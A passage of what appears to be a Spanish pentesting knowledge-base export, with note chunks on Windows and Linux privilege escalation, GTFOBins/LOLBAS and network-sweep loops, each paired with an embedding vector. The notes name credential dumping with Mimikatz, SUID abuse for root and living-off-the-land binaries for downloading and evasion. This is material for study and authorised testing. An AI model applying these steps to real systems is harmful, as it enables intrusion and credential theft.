`accesschk.exe` (SysInternals) → ver Herramientas (índice) y PEASS-ng.", "v": [-0.27332, -0.1423, -0.05304, -0.07967, 0.06295, -0.16842, 0.02694, -0.20398, 0.03508, 0.04687, -0.0063, 0.17441, -0.055, -0.15163, 0.06805, 0.04454, -0.01661, -0.10203, 0.02913, 0.10065, 0.0492, 0.11824, -0.17371, -0.00362, 0.00368, 0.15986, -0.21051, 0.1611, -0.02595, -0.10647, -0.08718, 0.03598, -0.10801, -0.06801, -0.06825, -0.10644, 0.03739, 0.09241, 0.15149, 0.19682, 0.05068, 0.10195, -0.08295, -0.00901, 0.08953, 0.03811, 0.10314, 0.01979, 0.12026, -0.03814, -0.08248, -0.06744, -0.12334, -0.02488, 0.03457, -0.0396, -0.01466, 0.08631, -0.09162, -0.0769, -0.03409, 0.01809, 0.05075, -0.025, 0.10089, -0.10135, 0.01904, -0.06586, 0.0542, 0.05504, -0.14986, 0.00402, -0.06313, 0.0044, 0.00376, -0.01398, 0.01978, -0.05904, 0.00136, 0.0212, -0.0213, -0.0286, 0.00678, -0.04437, -0.02695, 0.04872, 0.05679, -0.14333, -0.02603, -0.02462, 0.13631, 0.03381, -0.0322, 0.08135, 0.02711, -0.01329, -0.05384, 0.0374, 0.03022, -0.00478, 0.02976, 0.02123, -0.01596, 0.06235, 0.0459, 0.0394, -0.09194, 0.07288, -0.03536, -0.00487, 0.03939, 0.03785, 0.0431, -0.01366, -0.04723, 0.02331, -0.08313, 0.05079, -0.05714, -0.01013, 0.05224, -0.07306, -0.02513, 0.00201, -0.02189, -0.0621, 0.01907, 0.0213, 0.06171, -0.03574, -0.01374, -0.03703, 0.02329, -0.04539, -0.01173, 0.0094, -0.03748, 0.02955, 0.03161, -0.00975, 0.07457, 0.04652, 0.07125, 0.02235, -0.00646, -0.02743, 0.0205, 0.02031, 0.02281, 0.08729, 0.0329, 0.04116, 0.0296, 0.04747, 0.0984, 0.01471, -0.00185, 0.00163, 0.0364, -0.04246, -0.02657, 0.01113, 0.06323, 0.02251, -0.04529, 0.02728, 0.01472, -0.04583, -0.01829, -0.0048, 0.04698, 0.0087, -0.02113, -0.0548, -0.03755, -0.1038, 0.01683, -0.04321, -0.04891, 0.01799, -0.0181, -0.03942, -0.01472, -0.00053, -0.04614, 0.00224, 0.00305, -0.05143, -0.03616, -0.0109, -0.04043, 0.01941, 0.0247, -0.0437, 0.05334, -0.01066, -0.01219, -0.01976, -0.01848, -0.08226, -0.00509, -0.02521, -0.04761, 0.0225, 0.08261, -0.01404, 0.02954, 0.00502, -0.00831, -0.02333, -0.01104, 0.0041, 0.02526, -0.02183, 0.01849, -0.02939, 0.01015, -0.01718, -0.05331, 0.01713, -0.05132, 0.05093, 0.02691, 0.0209, 0.01197, 0.01586, 0.03578, -0.04088, 0.00759, 0.01966, -0.03554, 0.04758, -0.00053, 0.04068, 0.02667, 3e-05, -0.01041, 0.02867, 0.00801, -0.01672, 0.0087, 0.04092, 0.0251, -0.01917, -0.06009, -0.02914, -0.00667, 0.00239, 0.01538, -0.01484, 0.02319, -0.04309, -0.0055, -0.08971, 0.02557, -0.03223]} +{"tipo": "metodologia", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "texto": "## Tras conseguir SYSTEM\n- Mimikatz → `sekurlsa::logonpasswords` → hashes/creds de dominio.\n- Esas creds → Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks · Exploits conocidos · PEASS-ng · Privesc Linux · OSCP MOC", "v": [-0.21739, -0.15322, -0.10922, -0.15553, 0.04188, -0.17488, -0.06838, 0.01303, -0.17836, 0.13168, 0.00388, 0.03989, 0.01196, -0.07609, 0.12806, -0.01497, 0.11809, -0.01763, -0.09506, -0.06546, -0.07616, 0.00656, -0.19001, 0.01871, 0.25093, 0.13206, -0.05711, -0.0668, -0.0223, 0.01608, -0.10908, 0.03588, -0.11313, 0.07496, 0.01831, -0.04906, 0.00766, 0.01573, 0.16191, 0.22839, -0.0149, 0.0676, -0.06071, 0.11735, 0.07632, -0.17135, 0.02731, -0.04233, 0.05979, -0.09423, -0.01674, -0.07657, -0.16304, -0.04589, 0.071, -0.02452, 0.02948, -0.03111, -0.09004, 0.04943, -0.10198, 0.01596, 0.00417, -0.09369, -0.01584, -0.07023, 0.03705, -0.03793, -0.07861, 0.12249, -0.00395, 0.11598, 0.02758, 0.03529, 0.04935, -0.0342, 0.08225, 0.01381, 0.15572, 0.11171, 0.03916, -0.05463, 0.05365, -0.00801, -0.06759, -0.06932, -0.05887, -0.00868, -0.02167, 0.07903, 0.11779, 0.08006, -0.06898, 0.03932, 0.01435, 0.0077, -0.08308, 0.03494, -0.08372, -0.03374, -0.06747, 0.05406, -0.06321, 0.06422, -0.00299, -0.04026, 0.0124, 0.02652, 0.0529, -0.02364, 0.09012, -0.03545, -0.00458, -0.05244, -0.02953, 0.05102, -0.04343, -0.00307, -0.01183, 0.01496, -0.02989, -0.02219, 0.11768, -0.00562, -0.02541, -0.01577, -0.04922, 0.04721, -0.07414, -0.05418, 0.02887, -0.06126, 0.02004, -0.00655, -0.01511, 0.01837, 0.02526, -0.01602, 0.01159, -0.04453, -0.00492, -0.02097, -0.01445, 0.02, 0.04988, 0.04296, 0.02631, -0.01512, 0.02363, -0.0078, -0.03166, 0.01365, 0.01266, -0.02834, 0.03324, 0.0317, 0.00809, 0.01105, -0.05385, 0.01247, 0.05061, 6e-05, 0.00254, -0.01435, -0.05518, -0.0115, 0.06611, -0.03279, 0.01538, 0.02949, 0.02221, 0.0049, -0.05997, -0.01836, -0.01318, -0.07281, 0.05127, 0.00166, -0.03948, -0.00513, -0.01452, -0.0528, 0.04428, 0.02472, 0.03954, 0.02044, 0.00467, 0.05303, 0.01476, -0.0411, 0.01867, -0.01177, -0.02063, -0.02124, 0.01841, 0.02579, 0.03702, -0.04478, -0.04743, -0.00343, 0.00573, -0.00055, -0.01351, -0.02551, 0.03328, 0.00253, 0.01934, -0.02782, 0.011, -0.0222, 0.01194, 0.0343, 0.07108, -0.01034, -0.02758, 0.01713, 0.00031, 0.05088, -0.01654, -0.02308, -0.04579, 0.04696, 0.04939, 0.03161, 0.01685, -0.00112, -0.03249, -0.03676, -0.04105, -0.02623, 0.01279, -0.03972, 0.02416, -0.02238, 0.04068, -0.02071, -0.03494, 0.00302, -0.01237, 0.01947, -0.0045, 0.03202, 0.08029, -0.04813, -0.0942, -0.02512, -0.0004, -0.00627, -0.01388, 0.0011, 0.01314, -0.05357, -0.04495, -0.06561, -0.03078, 0.03727]} +{"tipo": "metodologia", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "texto": "# GTFOBins y LOLBAS\n\n> Las dos chuletas que conviertes en privesc/ejecución usando binarios legítimos.", "v": [-0.0372, -0.18714, -0.08894, 0.19061, 0.05326, -0.06735, -0.00919, 0.01853, -0.06119, 0.09039, 0.00223, 0.06692, -0.00084, 0.18838, 0.10047, -0.07709, -0.06438, -0.14964, -0.15499, -0.06353, -0.07621, 0.03821, -0.09472, 0.02588, 0.13209, 0.00053, -0.08348, -0.18542, -0.07003, 0.1063, 0.07811, 0.01546, -0.04843, 3e-05, 0.0255, 0.02271, -0.10317, 0.07978, -0.05125, 0.22811, 0.12213, 0.02742, -0.20145, 0.08201, 0.08456, -0.15166, -0.03772, 0.09808, -0.15904, -0.10624, 0.04093, 0.10647, -0.0453, -0.05806, 0.06963, -0.09827, 0.03827, -0.14614, -0.08817, -0.00309, -0.0462, -0.05081, 0.10003, 0.03911, 0.05515, -0.08114, -0.02692, 0.06392, -0.01687, -0.03772, -0.03899, 0.15299, -0.0086, 0.02175, 0.02732, -0.00325, -0.04124, -0.03221, 0.11514, 0.10629, -0.02665, -0.11438, -0.0076, 0.16727, 0.02311, -0.03092, 0.03552, -0.06057, -0.00898, -0.04688, 0.06037, 0.01856, -0.08089, 0.04177, 0.02368, -0.05367, -0.02771, -0.02181, 0.03948, 0.0007, 0.00107, 0.02909, -0.05354, 0.0378, -0.03279, 0.04711, 0.043, -0.02126, 0.0173, 0.01674, 0.06613, 0.05616, 0.03185, -0.0429, 0.07423, 0.04617, -0.01091, 0.00743, 0.02857, -0.01856, -0.01124, -0.01458, -0.03292, -0.07565, 0.07228, -0.03252, -0.06091, 0.10319, -0.00659, 0.10052, 0.01915, 0.02205, 0.02518, -0.01493, -0.07278, 0.06094, 0.04423, -0.07989, -0.01397, -0.07722, 0.09874, 0.06199, -0.00932, 0.03059, 0.02604, 0.07738, -0.01736, -0.1226, 0.04404, 0.01022, 0.07974, 0.02474, -0.01579, -0.00845, -0.03294, 0.00728, -0.0141, -0.08769, -0.06669, 0.03945, -0.03148, 0.04147, -0.01481, 0.01975, -0.05058, -0.0092, -0.00737, -0.05743, 0.0392, -0.06174, -0.02524, 0.02082, -0.06744, 0.04624, 0.04003, -0.04746, -0.01875, 0.04164, -0.0044, -0.05774, -0.01755, -0.04551, 0.01316, 0.01905, -0.02163, -0.02843, 0.03423, -0.02426, 0.01845, 0.01615, 0.05413, 0.0306, -0.00436, -0.00509, -0.00438, 0.02936, -0.01861, -0.04141, -0.03867, -0.00444, -0.00161, 0.01646, 0.01566, 0.05098, 0.02863, 0.02535, -0.01782, -0.0187, -0.03364, 0.0212, 0.00289, -0.09637, -0.01218, -0.03701, -0.00489, 0.02842, 0.00688, 0.00558, 0.04144, 0.01422, -0.0168, 0.04018, 0.03355, 0.00488, -0.01584, 0.0663, 0.01582, 0.0363, -0.01303, 0.02714, -0.03693, 0.05175, -0.03196, -0.04411, 0.02825, 0.04915, 0.00382, 0.01631, -0.01825, 0.00403, 0.01605, 0.02277, -0.02707, -0.00455, -0.05154, 0.02028, -0.04384, 0.00379, 0.00221, -0.03035, -0.0068, 0.02536, 0.00197, -0.04666, -0.0321, -0.04517]} +{"tipo": "metodologia", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "texto": "## GTFOBins (Linux) — https://gtfobins.github.io\n- Dado un binario con SUID, `sudo`, o capability → cómo abusarlo para shell/leer/escribir como root.\n- Flujo: `sudo -l` o `find / -perm -4000` → buscas el binario en GTFOBins.\n- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID → root trivial.", "v": [0.06034, -0.09454, -0.12866, 0.02529, 0.12749, -0.18348, -0.17726, -0.04897, -0.04418, 0.09365, -0.03882, -0.00595, 0.01644, -0.05685, -0.01848, -0.097, -0.09399, -0.14571, -0.07624, -0.01884, -0.01716, 0.16533, 0.00603, -0.02188, 0.07961, 0.08233, 0.00883, 0.00458, -0.07546, 0.03017, 0.10679, 0.02595, 0.07033, -0.08986, -0.22198, 0.03816, 0.01971, 0.12754, -0.0691, 0.25781, -0.00432, 0.00344, -0.1437, 0.15673, -0.08945, -0.17981, -0.00816, 0.00038, -0.03189, -0.02545, 0.00585, 0.00934, -0.05583, -0.07039, 0.0739, -0.02295, 0.15478, -0.16584, -0.03855, 0.00117, -0.07398, -0.0111, 0.06846, -0.02798, 0.03462, -0.0291, 0.01815, 0.07517, -0.12792, 0.1231, -0.09437, 0.10406, -0.1017, 0.01918, 0.04829, 0.00148, 0.01283, -0.00235, 0.1503, 0.0556, -0.00135, -0.04288, -0.03394, 0.07714, -0.0757, -0.07001, 0.09013, -0.0259, -0.0733, -0.00826, 0.05179, 0.00949, 0.01116, -0.03535, 0.03683, -0.06586, 0.02168, 0.02809, 0.00419, -0.04139, -0.01316, 0.03291, -0.03379, 0.10356, 0.04013, 0.02396, 0.00695, 0.02364, -0.04366, -0.052, 0.08629, 0.00616, 0.11129, 0.00056, 0.01231, 0.01288, -0.10098, 0.01008, 0.03357, -0.04081, -0.01113, 0.00901, -0.0186, -0.01758, 0.01328, -0.04528, -0.0367, 0.08661, 0.02861, -0.01301, 0.02477, -0.02624, -0.02664, 0.04636, -0.09784, 0.15911, 0.08293, -0.0725, 0.02737, -0.0632, 0.03652, 0.02062, 0.01132, -0.00171, 0.02816, 0.01018, 0.03383, -0.09089, -0.04773, -0.00573, 0.01888, 0.00944, 0.03224, 0.00754, -0.07173, -0.05259, -0.00321, -0.04907, -0.03923, -0.02389, 0.0246, 0.01054, -0.04388, 0.03675, -0.00558, -0.02142, -0.01954, -0.05713, 0.02539, -0.01969, -0.06068, 0.01863, -0.00835, -0.02314, 0.02393, -0.10534, 0.07124, -0.03764, -0.02875, -0.01305, 0.02988, -0.02356, 0.01349, -0.01297, 0.0011, -0.04124, 0.06261, -0.03981, -0.01784, -0.02661, 0.06995, 0.03439, -0.00042, -0.04799, 0.06075, 0.07031, -0.02567, -0.00972, -0.0039, -0.0362, -0.0396, 0.02533, -0.00203, -0.01174, 0.01639, -0.00637, -0.04691, -0.02643, -0.09521, 0.02095, 0.00291, -0.0217, 0.02071, -0.07766, -0.00847, -0.02749, -0.0419, 0.01386, 0.07366, -0.01568, -0.02639, 0.1095, 0.05323, 0.00466, -0.04223, 0.01476, 0.01526, -0.02619, 0.01022, 0.06342, -0.04793, 0.03117, -0.046, -0.06487, 0.02137, -0.00757, -0.01409, 0.02439, -0.0301, -0.02203, -0.00332, 0.06934, -0.00796, -0.06533, -0.05247, -0.01693, -0.08199, 0.014, 0.02531, -0.02991, -0.0187, -0.00075, 0.01911, -0.05195, -0.00434, -0.01113]} +{"tipo": "metodologia", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "texto": "## LOLBAS (Windows) — https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "v": [0.04601, -0.09229, -0.10675, -0.02504, 0.1367, -0.13874, -0.15677, -0.0038, -0.08726, -0.03135, -0.0158, -0.16767, 0.01886, 0.07579, 0.03625, -0.09592, -0.04517, -0.06509, -0.04249, -0.13969, 0.00947, 0.13172, -0.08779, -0.01459, 0.06848, 0.0885, -0.04854, -0.00745, -0.1436, 0.10384, 0.05387, 0.02106, 0.08673, 0.06607, 0.01038, 0.02862, -0.02593, 0.07318, 0.05914, 0.20801, 0.07352, 0.09008, -0.02841, 0.13803, 0.00579, -0.22852, 0.1008, -0.05683, 0.03615, -0.12768, 0.02424, 0.04842, -0.10413, 0.01752, 0.05237, -0.10251, 0.16356, -0.13741, -0.03832, -0.00069, -0.07306, 0.09237, 0.01881, 0.02103, 0.01507, -0.03007, 0.05718, 0.01437, -0.02754, 0.13145, -0.03291, 0.15289, 0.0301, 0.02778, -0.03343, -0.06233, -0.02937, -0.09897, 0.14429, 0.04651, -0.03035, -0.02402, 0.00656, 0.03243, 0.00958, -0.04987, -0.04485, -0.0945, -0.0274, -0.0414, 0.07255, -0.04797, -0.08836, -0.01593, 0.07429, -0.05473, 0.00249, -0.01178, 0.00524, 0.0081, -0.07143, 0.023, -0.01457, 0.09001, 0.01943, 0.12184, 0.01712, -0.04732, -0.02258, -0.00719, 0.08699, 0.09052, 0.05534, -0.03556, 0.05664, 0.02493, -0.05267, -0.01517, 0.04081, 0.03219, -0.04629, 0.00654, -0.06358, -0.02725, 0.03799, -0.12677, -0.09998, 0.10828, -0.08516, 0.09244, 0.03972, 0.00426, -0.09253, -0.00693, -0.12365, 0.08457, 0.06796, -0.07863, -0.02228, -0.03049, 0.03853, 0.10592, 0.02679, 0.08096, 0.06005, 0.09172, -0.00722, -0.02582, 0.03636, -0.01923, 0.07793, 0.07105, -0.02104, 0.01309, -0.03225, -0.04395, 0.01111, 0.02155, -0.02767, 0.00978, 0.00941, 0.0987, -0.02661, -0.00342, -0.04363, -0.01463, -0.01097, -0.00117, -0.01115, -0.01717, 0.00884, 0.00945, -0.05987, -0.06328, 0.05841, -0.08948, 0.05131, -0.05173, -0.00336, -0.04619, -0.04742, -0.02818, 0.06386, 0.03135, 0.02396, 0.0327, 0.02842, 0.02901, -0.00125, 0.05854, -0.02541, 0.02096, -0.02043, 0.0011, -0.01826, 0.00804, -0.02936, -0.05495, -0.00873, -0.03127, 0.01252, -0.0309, -0.00278, -0.0205, 0.06444, 0.02345, -0.03295, 0.0011, -0.02849, 0.00762, 0.0245, -0.02647, 0.01703, -0.05245, 0.0133, -0.05696, 0.00622, 0.00976, 0.08967, -0.03198, -0.02043, 0.03329, 0.06757, 0.01417, 0.00457, 0.02194, 0.02453, -0.0004, -0.01677, 0.0207, -0.00354, 0.02479, 0.00309, -0.02993, 0.06477, 0.00639, -0.01363, 0.0176, -0.04222, -0.06757, -0.02743, 0.0568, -0.02958, -0.07097, -0.07483, -0.01773, -0.05659, -0.0507, 0.00995, -0.04645, -0.0177, -0.01433, 0.00608, -0.05626, -0.04717, 0.01997]} +{"tipo": "metodologia", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "texto": "## Cómo encaja\n- Privesc Linux → GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows → LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos públicos · OSCP MOC", "v": [-0.32652, -0.16991, -0.09231, -0.10262, -0.04946, -0.19198, -0.0234, -0.06692, 0.02714, 0.03804, 0.10046, -0.05636, 0.12223, -0.03005, 0.07224, -0.06133, 0.03264, -0.06882, -0.02321, -0.01446, -0.06016, 0.10343, -0.09085, 0.03665, 0.15967, 0.04961, 0.06118, -0.15256, -0.02411, -0.01096, -0.05755, 0.0455, -0.0569, 0.09597, -0.10173, 0.07367, 0.05927, 0.05634, 0.0152, 0.15819, 0.07982, 0.08784, -0.0199, 0.06996, 0.0364, -0.21894, 0.08147, -0.00091, -0.06186, -0.14634, -0.08621, -0.03694, -0.09178, -0.14577, 0.00657, 0.04245, 0.04022, -0.09397, -0.03745, 0.09453, -0.17998, 0.05345, 0.0564, -0.07081, 0.02619, -0.09386, -0.02956, 0.05315, -0.07206, 0.04903, 0.00639, 0.11847, -0.03146, -0.03271, 0.00098, -0.06164, 0.04133, -0.02387, 0.1562, 0.06513, -0.02149, -0.0103, 0.04733, 0.06234, -0.03464, -0.11969, 0.04998, 0.01635, 0.02466, -0.03495, 0.09148, -0.02789, -0.00777, 0.07263, 0.10527, -0.08854, 0.03286, 0.01155, 0.01246, -0.00506, 0.00114, 0.04925, -0.05684, 0.03717, -0.01747, 0.01494, 0.08032, -0.10415, -0.03833, 0.00824, 0.07993, 0.07343, 0.00521, -0.02358, -0.00812, -0.00447, -0.02367, -0.07918, 0.01929, -0.00476, -0.08697, -0.01491, 0.03564, -0.09659, 0.04282, -0.00757, -0.06112, 0.10096, -0.01515, 0.04712, 0.04065, -0.04231, 0.06263, 0.06467, -0.05268, 0.04143, 0.03747, -0.07043, 0.02974, -0.08332, 0.03672, 0.04515, -0.00539, -0.01285, 0.09434, 0.01026, 0.05205, -0.06546, -0.03033, -0.03822, -0.00836, 0.02304, -0.00675, -0.03971, -0.00332, -0.01542, -0.00214, 0.04715, -0.0364, -0.05974, 0.02916, 0.00767, -0.09437, -0.026, -0.09178, 0.00138, -0.02346, 0.01189, 0.02317, -0.01616, -0.02094, -0.01636, -0.00916, -0.03048, 0.03291, -0.11109, 0.10808, -0.04256, -0.04501, -0.01441, 0.01327, -0.03655, 0.02434, 0.03671, 0.03049, -0.01565, -0.0078, -0.02734, -0.03362, 0.02691, 0.02337, 0.03075, 0.06222, -0.0302, 0.01483, 0.01386, 0.01779, -0.04021, -0.01018, -0.00133, -0.03601, -0.02867, -0.02979, 0.04246, 0.03529, -0.04734, 0.01062, -0.0138, -0.01101, 0.01827, 0.00786, -0.01003, 0.03752, -0.04152, 0.06327, 0.05722, -0.01739, 0.00822, -0.01565, 0.01193, 0.00089, 0.06415, 0.00926, -0.02479, 0.00773, -0.00843, -0.05554, 0.00656, -0.00227, -0.00435, -0.00209, 0.01872, 0.0481, -0.04923, -0.00637, 0.02921, -0.00385, 0.0053, 0.03011, -0.03145, -0.0029, 0.06951, 0.00251, -0.05989, -0.06098, 0.0122, -0.02079, -0.02597, -0.00305, 0.00927, -0.00117, -0.03359, 0.00183, -0.01081, -0.07125, 0.05309]} +{"tipo": "metodologia", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "texto": "# Bucles bash sobre IPs\n\n> Lo que ahorra horas: enumerar **toda la red** de golpe a partir de la salida greppable de Nmap. Usa Operadores Bash.", "v": [-0.14357, -0.22182, -0.09814, -0.06822, -0.08007, -0.07959, 0.01697, 0.04667, -0.10377, 0.02849, -0.16653, -0.13856, 0.0622, 0.05171, -0.06927, 0.00234, -0.20093, 0.01884, -0.03166, -0.09689, -0.06079, 0.24485, -0.01481, 0.07728, -0.06299, 0.02303, -0.13078, 0.04906, -0.14791, -0.04366, -0.18572, -0.13269, -0.04792, -0.09433, -0.00538, -0.00092, -0.08922, -0.04835, 0.04751, 0.12446, -0.04245, 0.0856, -0.11919, 0.02298, 0.15765, -0.07492, 0.08011, 0.09201, -0.02356, -0.10847, -0.03976, -0.02088, -0.09634, -0.06849, -0.12168, 0.00425, 0.02933, -0.00023, -0.11872, 0.08554, 0.01294, -0.01221, -0.05435, -0.06393, -0.01401, -0.02677, -0.06946, -0.07605, -0.01075, 0.02026, -0.03928, 0.07894, -0.0754, 0.1987, 0.02438, 0.006, 0.01387, -0.0111, 0.0753, 0.02228, 0.04675, 0.00652, -0.11669, 0.00546, -0.05218, -0.04321, 0.12054, -0.13458, -0.04273, 0.02267, 0.05699, 0.08791, 0.02715, 0.04975, -0.00706, -0.06861, -0.01752, -0.0097, 0.05187, -0.05045, 0.03077, 0.00359, -0.10398, 0.03632, 0.09459, 0.05676, 0.10543, 0.15372, 0.03341, 0.02543, -0.0574, 0.03415, -0.02512, -0.00619, -0.02642, -0.0045, -0.06826, -0.00511, -0.03795, 0.00357, 0.04412, -0.00902, -0.01466, -0.00851, 0.0299, 0.0266, -0.08914, 0.04846, -0.01417, -0.02338, 0.03976, 0.09941, 0.05799, 0.01197, 0.03759, 0.01739, 0.03157, -0.03781, -0.02069, -0.06345, 0.04084, 0.05186, -0.04978, 0.00139, 0.06664, 0.01742, 0.01566, -0.00544, -0.0314, -0.02048, 0.064, 0.03426, -0.00637, -0.0029, -0.01618, 0.02512, -0.01956, -0.00517, -0.05195, 0.02696, -0.03569, -0.0269, -0.00504, 0.02328, -0.01234, 0.00321, -0.0571, -0.01265, -0.00987, 0.07708, -0.01355, 0.07721, -0.02765, 0.03928, -0.02124, -0.07138, -0.05435, -0.0551, 0.05394, -0.01622, 0.00753, -0.00331, 0.02316, -0.00294, -0.01591, -0.02295, 0.04009, -0.01416, 0.02053, -0.03361, 0.03111, 0.05734, 0.04737, 0.0331, -0.01389, 0.01067, -0.02204, -0.08228, -0.00063, 0.04672, -0.06148, 0.00162, -0.06914, -0.02153, 0.02493, 0.0529, -0.01351, -0.01075, -0.01527, -0.00466, 0.02088, 0.01075, 0.00313, -0.01203, -0.00181, -0.05702, 0.04684, 0.04588, 0.0436, 0.00401, 0.05414, 0.04273, -0.00359, 0.05182, -0.04615, -0.06654, -0.0117, -0.02915, -0.00476, 0.01, 0.01354, -0.02179, -0.00913, -0.01598, -0.05319, -0.08655, 0.03688, -0.01355, -0.04353, -0.04306, -0.04188, 0.01641, -0.06676, -0.05588, -0.05712, -0.00629, -0.02249, -0.02402, 0.03044, -0.01304, -0.02339, 0.04318, 0.01741, -0.102, 0.01123, -0.0187]} +{"tipo": "metodologia", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rápido → Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "v": [0.04677, -0.12279, -0.08828, -0.02656, -0.09309, -0.10157, -0.09495, -0.02314, 0.01527, 0.01959, -0.06322, 0.01133, -0.01189, -0.08273, -0.21862, -0.0632, -0.18544, 0.01715, 0.04666, 0.01465, -0.09183, 0.11462, -0.08502, -0.02272, 0.11202, 0.20978, -0.10162, 0.09365, -0.12341, -0.06482, 0.01523, -0.00134, -0.03498, -0.01652, -0.03868, 0.0424, 0.0418, 0.07337, -0.02259, 0.12966, -0.03313, 0.04809, -0.07209, 0.0394, 0.05717, -0.16698, 0.10333, 0.06115, 0.0944, -0.03862, -0.08471, -0.02422, -0.08637, -0.08356, -0.00163, 0.0176, 0.06804, 0.02438, -0.07943, -0.11956, 0.06319, 0.09274, -0.04408, -0.02159, 0.06231, 0.01492, -0.00367, -0.05703, 0.00341, 0.061, -0.06111, 0.08234, -0.03719, -0.00184, 0.11911, 0.03879, 0.06514, -0.14794, 0.05031, 0.03493, -0.08442, -0.02595, -0.03939, -0.03667, -0.04843, -0.05272, 0.01753, -0.12284, 0.01855, 0.0079, -0.01945, 0.0371, -0.01457, 0.04603, 0.01156, -0.07031, -0.03407, 0.00506, 0.0021, -0.05408, 0.0587, -0.01083, -0.15601, 0.10616, 0.16694, 0.05363, -0.00464, -0.017, 0.00249, 0.01931, 0.07553, 0.0062, 0.01024, -0.10139, -0.05234, 0.00239, -0.05717, -0.01089, -0.0732, 0.01668, 0.0152, 0.04539, -0.03213, -0.01632, 0.00399, -0.05306, -0.06891, 0.03897, 0.18486, 0.00836, 0.05471, 0.01289, -0.08845, -0.0315, -0.05263, 0.04966, -0.04049, 0.02858, -0.02458, -0.04115, 0.01393, 0.02859, -0.01311, -0.01427, 0.03246, 0.05464, -0.0125, -0.04702, -0.09897, 0.06768, 0.03726, 0.0619, -0.04081, -0.05539, 0.06125, -0.01045, 0.03001, -0.09709, -0.06419, 0.03557, 0.05507, 0.05934, 0.1181, 0.07989, 0.011, -0.00182, -0.00851, -0.03734, 0.01892, -0.0541, 0.01772, 0.01837, -0.11004, -0.03658, 0.00022, 0.03967, 0.06077, -0.06427, -0.05877, -0.06256, 0.0718, -0.02046, -0.00154, 0.00689, -0.00876, -0.00701, 0.01319, -0.06662, 0.04894, -0.04497, -0.05716, 0.00411, 0.03371, 0.05145, 0.00342, 0.02447, 0.02719, -0.01547, 0.0061, 0.04984, -0.01271, 0.01683, -0.01061, -0.06624, 0.02979, -0.04181, -0.0087, -0.00651, 0.00546, 0.02624, 0.03654, 0.0522, -0.00513, 0.04787, -0.08597, -0.10114, 0.00867, -0.06503, 0.00135, -0.02695, 0.03606, 0.03489, 0.02201, 0.01412, 0.05715, -0.01766, 0.04068, -0.01637, 0.01346, 0.03773, -0.03541, 0.06744, -0.00875, -0.06314, -0.05166, 0.01565, 0.08315, 0.01103, -0.06923, -0.00878, -0.04333, 0.07275, -0.01835, -0.09475, -0.08183, -0.04162, 0.02586, 0.06979, -0.01985, -0.03825, -0.01961, -0.06853, 0.00965, -0.15215, 0.08488, 0.01806]} +{"tipo": "metodologia", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuántos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "v": [0.20752, -0.20991, -0.03184, -0.09934, 0.02574, -0.18657, -0.1337, -0.06335, 0.02389, 0.0838, -0.05672, -0.04801, 0.05584, -0.02873, -0.01803, 0.06706, -0.16732, -0.07363, 0.02299, 0.08448, -0.07452, 0.15517, 0.00813, -0.12918, -0.01163, 0.03931, -0.10458, 0.09799, -0.1423, -0.02908, 0.03789, -0.14502, -0.12378, -0.04141, -0.10175, -0.055, 0.0458, 0.04226, 0.02243, 0.18186, -0.04792, -0.03155, -0.12736, 0.04838, 0.0676, -0.15689, -0.0264, 0.05151, -0.05911, -0.06832, -0.1171, 0.00286, -0.07213, -0.05774, -0.20432, 0.04547, -0.00176, -0.04365, -0.07891, 0.04986, -0.03822, 0.08207, 0.02807, -0.14391, -0.01302, -0.10039, 0.07849, -0.00987, -0.10599, 0.04095, -0.06564, 0.08255, 0.00201, 0.07203, 0.05972, 0.01952, 0.05002, -0.07494, 0.11281, 0.1492, 0.01084, -0.06073, -0.09831, -0.06673, 0.02156, -0.10959, 0.04834, 0.00166, -0.02416, -0.11175, 0.04381, 0.01142, 0.05081, 0.10618, 0.01298, -0.08747, -0.00865, 0.05344, 0.02584, 0.0246, 0.05269, 0.06194, -0.14776, 0.02405, -0.01447, 0.01563, 0.0405, 0.07712, -0.06659, 0.08225, 0.09759, 0.05633, 0.01753, -0.03946, -0.03582, -0.06432, -0.02537, 0.00601, 0.00736, -0.07331, -0.02942, -0.08606, -0.02288, 0.06829, -0.01633, 0.03385, -0.01195, 0.01748, 0.03782, 0.0261, -0.03301, 0.07026, 0.05888, -0.04419, -0.07021, -0.06146, 0.05078, 0.03345, -0.02048, 0.03085, -0.08528, 0.05013, -0.00744, 0.00545, 0.05733, -0.07437, -0.01465, -0.0292, -0.0319, 0.01812, 0.07774, 0.01772, -0.03763, 